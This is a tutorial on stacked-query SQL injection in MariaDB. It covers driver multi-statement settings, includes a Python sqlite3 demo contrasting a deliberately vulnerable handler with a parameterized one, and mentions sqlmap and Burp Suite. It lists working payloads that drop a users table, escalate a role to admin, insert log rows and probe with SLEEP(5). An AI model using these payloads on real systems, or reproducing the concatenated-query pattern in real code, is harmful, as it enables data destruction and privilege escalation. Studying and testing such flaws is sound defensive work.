MariaDB Stacked Queries

Context

This article covers stacked queries as an SQL injection technique against MariaDB. Stacked queries let an attacker append further SQL statements to the one the application intended to run, so an injection point that would otherwise only leak data can be turned into arbitrary statement execution: data modification, schema changes, privilege changes. The guide assumes familiarity with basic SQL syntax, database transactions, and the HTTP request/response model.

Theory

Stacked Queries in SQL Injection

Stacked queries, also called multi-statement or multi-query injection, terminate the application's statement with a semicolon and append one or more statements of the attacker's choosing. The precondition is an ordinary injection flaw: user input concatenated into SQL text instead of being passed as a bound parameter. Where a UNION-based or blind injection is confined to the shape of the original SELECT, a stacked injection can run any statement the database account is allowed to run, such as dropping or altering tables, inserting rows (into logs or anywhere else), or changing user roles.

MariaDB Specific Considerations

The MariaDB server can execute several semicolon-separated statements in one request, but only if the client asked for it when connecting: the CLIENT_MULTI_STATEMENTS capability flag is off by default in the C API, and each driver exposes it differently. PHP's mysqli_query() refuses a second statement while mysqli_multi_query() runs it; PHP's PDO MySQL driver has multi-statement execution enabled by default; JDBC needs allowMultiQueries=true; mysql-connector-python needs execute(..., multi=True). Whether a given injection point supports stacked queries is therefore a property of the application's database connection, not of MariaDB itself, and it is the first thing to establish. Stripping semicolons from input is not the fix: the value must be bound as a parameter so it is never parsed as SQL at all.

Prepared Statements and Stacked Queries

Stacked queries do not bypass a correctly parameterized statement. A server-side prepared statement in MariaDB may contain only a single statement, and a value bound to a placeholder is delivered as data, so '1; DROP TABLE users' bound to the id parameter is compared as a value, never parsed as SQL. The cases that do get exploited are ones where the prepare/execute API is used but attacker input still reaches the SQL text: a query assembled by string concatenation and only then prepared, a parameterized WHERE clause next to a concatenated ORDER BY column or table name, or input that is merely escaped rather than bound. When such a flaw exists on a connection with multi-statement execution enabled, the result is a full stacked-query injection. The check is therefore not whether the code calls prepare(), but whether every piece of user input reaches the server as a bound parameter.

Practice

MariaDB Stacked Query Injection

When exploiting a stacked-query injection in MariaDB by hand, the work is to find an injection point, confirm that the connection runs several statements, and then append the statement you want. The statements below are what the server receives when the application concatenates the id parameter into its lookup query; everything after 'id=' is the attacker-supplied value:

  • Injecting a Dropping Table Command

    Consider an initial point of injection that allows retrieval of user data by ID:

    SELECT * FROM users WHERE id=1; DROP TABLE users;
    

Submitting '1; DROP TABLE users' as the id makes the server run the intended SELECT and then drop the 'users' table. DROP TABLE is DDL and commits implicitly in MariaDB, so it cannot be rolled back; on an engagement, demonstrate the impact on a table you created yourself.

  • Modifying a User Role

    Another use case involves elevating user privileges by changing their role:

    SELECT * FROM users WHERE id=1; UPDATE users SET role='admin' WHERE id=1;
    

Here the value submitted for id is 1; UPDATE users SET role='admin' WHERE id=1. After the lookup, the second statement changes the role of user 1 to 'admin'. The change is persistent: it outlives the request and takes effect the next time the application checks that user's role.

  • Logging an Injected Action

    An example showing the injection of a logged statement into an application's logs:

    SELECT * FROM users WHERE id=1; INSERT INTO logs (action) VALUES ('injected');
    

Here the value submitted for id is 1; INSERT INTO logs (action) VALUES ('injected'). The INSERT adds a row to the 'logs' table right after the SELECT. A harmless write like this is a good way to prove that stacked execution works without damaging anything.

In each case several statements run in a single request. The application normally reads only the first result set, so the appended statement runs blind: its output is never shown, and an error in it may not surface either. Two checks help before committing to a payload. First, if the connection does not allow multiple statements, MariaDB rejects the whole request with syntax error 1064 near the semicolon, so the legitimate query fails as well and the page usually breaks or shows an error. Second, a time delay confirms that the appended statement really executed: submitting 1; SELECT SLEEP(5) should delay the response by about five seconds. If the original query has trailing clauses after the injection point, end your statement with a comment marker ('-- ' including the trailing space, or '#') so the remainder is ignored.
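The following script is an added example, not code from the original article, that plays through the three payloads above and the two points made in the Theory section: the connection's multi-statement setting decides whether the appended statement runs at all, and a bound parameter neutralises it regardless. Python's sqlite3 module stands in for MariaDB so the script runs offline with no server: cursor.execute() accepts exactly one statement, like a MariaDB connection opened without CLIENT_MULTI_STATEMENTS, and running each semicolon-separated statement in turn models a connection opened with that flag. The table, column and function names are chosen for this example.

```python
"""Stacked-query injection against a lookup-by-id handler, modelled with sqlite3.

sqlite3 is a stand-in for MariaDB (added example, not the article's code):
  * cursor.execute() runs one statement, like MariaDB without CLIENT_MULTI_STATEMENTS;
  * executing each ';'-separated statement in turn models a connection with the
    flag set (mysqli_multi_query, JDBC allowMultiQueries=true, mysql-connector multi=True).
"""
import sqlite3

# Constructed schema: the 'users' and 'logs' tables the article's payloads target.
SEED_SQL = """
CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT);
INSERT INTO users VALUES (1, 'alice', 'user'), (2, 'bob', 'user');
CREATE TABLE logs (id INTEGER PRIMARY KEY AUTOINCREMENT, action TEXT);
"""


def fresh_db():
    """New in-memory database with the seed data above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SEED_SQL)
    return conn


def split_statements(sql):
    """Split SQL text on ';' outside single-quoted strings: roughly what the
    server does with a multi-statement request (simplified: no comments,
    backtick identifiers or backslash escapes)."""
    stmts, buf, in_str = [], [], False
    for ch in sql:
        if ch == "'":
            in_str = not in_str
        if ch == ";" and not in_str:
            stmts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    stmts.append("".join(buf))
    return [s.strip() for s in stmts if s.strip()]


def lookup_concat(conn, user_id, multi_statements):
    """VULNERABLE handler: the raw parameter is pasted into the SQL text.

    Returns {'rows': first statement's rows or None, 'error': str or None}.
    Only the first result set is returned, as a typical application would do,
    so everything after the ';' runs blind."""
    sql = f"SELECT id, name, role FROM users WHERE id={user_id}"
    try:
        if not multi_statements:
            # One statement per call: a stacked payload makes the whole request
            # fail (MariaDB: syntax error 1064) and nothing runs, not even the SELECT.
            rows = conn.execute(sql).fetchall()
        else:
            rows = None
            for stmt in split_statements(sql):
                cur = conn.execute(stmt)
                if rows is None:
                    rows = cur.fetchall()
            conn.commit()
        return {"rows": rows, "error": None}
    except (sqlite3.Error, sqlite3.Warning) as exc:
        return {"rows": None, "error": str(exc)}


def lookup_param(conn, user_id):
    """HARDENED handler: the value is bound as a parameter and is never parsed
    as SQL, whatever the connection's multi-statement setting. (sqlite3 returns
    no row for the non-numeric string; MariaDB would cast '1; DROP TABLE users'
    to 1 with a truncation warning and return the row. Either way the DROP is data.)"""
    return conn.execute(
        "SELECT id, name, role FROM users WHERE id=?", (user_id,)
    ).fetchall()


def table_exists(conn, name):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (name,)
    ).fetchone()
    return row is not None


def role_of(conn, user_id):
    row = conn.execute("SELECT role FROM users WHERE id=?", (user_id,)).fetchone()
    return row[0] if row else None


def log_actions(conn):
    return [r[0] for r in conn.execute("SELECT action FROM logs ORDER BY id")]


# The three payloads from the Practice section, as the value submitted for id.
PAYLOADS = {
    "drop": "1; DROP TABLE users",
    "role": "1; UPDATE users SET role='admin' WHERE id=1",
    "log": "1; INSERT INTO logs (action) VALUES ('injected')",
}

if __name__ == "__main__":
    for label, payload in PAYLOADS.items():
        conn = fresh_db()
        res = lookup_concat(conn, payload, multi_statements=True)
        alive = table_exists(conn, "users")
        print(label, "| first result:", res["rows"], "| users exists:", alive,
              "| role of 1:", role_of(conn, 1) if alive else "n/a",
              "| logs:", log_actions(conn))
    conn = fresh_db()
    print("single-statement connection:", lookup_concat(conn, PAYLOADS["drop"], False)["error"])
    print("bound parameter:", lookup_param(conn, PAYLOADS["drop"]), "| users exists:", table_exists(conn, "users"))
```

Running the script shows the same SELECT result for every payload while the side effects (a dropped table, an 'admin' role, a log row) happen silently; on the single-statement connection the whole request errors out and the table survives, and with the bound parameter the payload is just an id that matches nothing.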

Tools

  • sqlmap
  • Burp Suite

sqlmap tests for stacked queries as one of its injection techniques (selected with --technique=S) and states in its summary whether the injection point supports them, which settles the connection-flag question without guesswork; once confirmed, it uses them for data manipulation. Burp Suite's Repeater is the place to hand-craft the payloads above and to watch response times when confirming execution with SLEEP().
